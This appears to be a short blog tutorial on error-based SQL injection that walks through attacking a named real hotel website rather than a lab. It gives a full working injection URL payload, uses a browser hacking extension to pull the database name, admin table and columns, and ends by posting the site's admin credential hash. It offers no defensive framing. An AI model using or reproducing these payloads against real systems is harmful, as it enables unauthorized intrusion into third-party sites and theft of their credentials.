Error Based SQL Injection

Auntor Acharja
3 min readNov 18, 2020

We mainly use error base SQL injection when we do not access any website admin by manual SQL injection or WAF Bypass.

I recommend using Firefox Hackbar extension for Error base SQL injection, There is a part in hackbar like ERROR/DOUBLE .it will make our error base SQL injection procedure easier.

Our target site is:http://www.embryohotel.com/room-detail.php?id=11

Step 1: First add string(‘) to check if the site is vulnerable or not. My target site is Vulnerable because using the sting the content of the page is changed and it shows some message.

Fig1: Check vulnerable by String(‘)

Step2: No following manual SQL injection or Union base SQL injection try to find out a vulnerable column. In my target site, it shows an error message.

Fig2: find the vulnerable column

Step 3:Lets try WAF Bypass, but in my target site, it's also not work. So we need to use Error base SQL infection.

Fig3: Try with WAF Bypass

Step4: We need to find out the database name, So click this way in the firefox hackbar extension,

ERROR/DOUBLE -> Error Based -> Get Database

Fig4: Get the Database name

We get the Database: cp227754_embryohotel_db

Step 5: find out the admin/required Table, So click this way in firefox hackbar extension,

ERROR/DOUBLE -> Error Based -> Get Tables

Fig5: Get the table name

We get the Table: admin

Step 6: find out the Columns, So click this way in firefox hackbar extension,

ERROR/DOUBLE -> Error Based -> Get Columns

Fig6: Get the username Column
Fig7: Get the password Column

We get the Column: username, password

Note: if there are multiple columns then change the limit and re-run , then it will also show the different columns. Like:

http://www.embryohotel.com/room-detail.php?id=-11+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e+AND+table_schema=0x63703232373735345f656d6272796f686f74656c5f6462+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--

Increment 1,2,3,4…….

Step 7: Now find out data from this two-column(username, password) ,So click this way in firefox hackbar extension,

Fig6: Get admin username and password

ERROR/DOUBLE -> Error Based -> XPATH EXTRACTVALUE ->Get Data

We get admin => e742c63f03ab602f2b38433ffc

--

--